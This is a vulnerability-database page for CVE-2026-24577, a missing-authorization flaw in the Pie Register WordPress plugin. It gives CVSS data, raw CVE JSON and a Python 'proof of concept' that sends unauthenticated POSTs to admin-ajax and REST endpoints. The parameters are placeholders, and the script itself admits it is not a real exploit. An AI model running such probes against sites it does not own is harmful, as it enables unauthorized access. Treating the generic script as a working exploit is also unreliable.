Security Vulnerability Report
中文
CVE-2026-24577 CVSS 5.3 MEDIUM

CVE-2026-24577

Published: 2026-01-23 15:16:15
Last Modified: 2026-04-28 15:16:16

Description

Missing Authorization vulnerability in Genetech Products Pie Register pie-register allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pie Register: from n/a through <= 3.8.4.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Pie Register <= 3.8.4.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24577 PoC - Pie Register Missing Authorization # This PoC demonstrates the access control bypass vulnerability import requests import sys TARGET_URL = "http://target-wordpress-site.com" def exploit_missing_auth(): """ Exploit for Pie Register < =3.8.4.8 Missing Authorization vulnerability Attackers can access protected functions without proper authentication """ # Vulnerable endpoints that lack authorization checks vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/pie-register/v1/" ] print(f"[*] Testing CVE-2026-24577 on {TARGET_URL}") print("[*] Target: WordPress Pie Register plugin") print("[*] Vulnerability: Missing Authorization / Broken Access Control") for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" # Test unauthenticated access to protected functions headers = { "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest" } # Example payload - accessing admin functions without auth data = { "action": "pie_register_ajax", "pie_action": "admin_function", "security_token": "" } try: response = requests.post(url, data=data, headers=headers, timeout=10) # Check for successful unauthorized access if response.status_code == 200: print(f"[+] Potential vulnerability confirmed at {endpoint}") print(f"[+] Response: {response.text[:200]}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] PoC execution completed") print("[*] Note: This is a demonstration, actual exploitation requires specific endpoint identification") if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] exploit_missing_auth()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24577", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:15.480", "lastModified": "2026-04-28T15:16:16.107", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Genetech Products Pie Register pie-register allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Pie Register: from n/a through <= 3.8.4.8."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en Genetech Products Pie Register pie-register permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Pie Register: desde n/a hasta &lt;= 3.8.4.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/pie-register/vulnerability/wordpress-pie-register-plugin-3-8-4-7-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}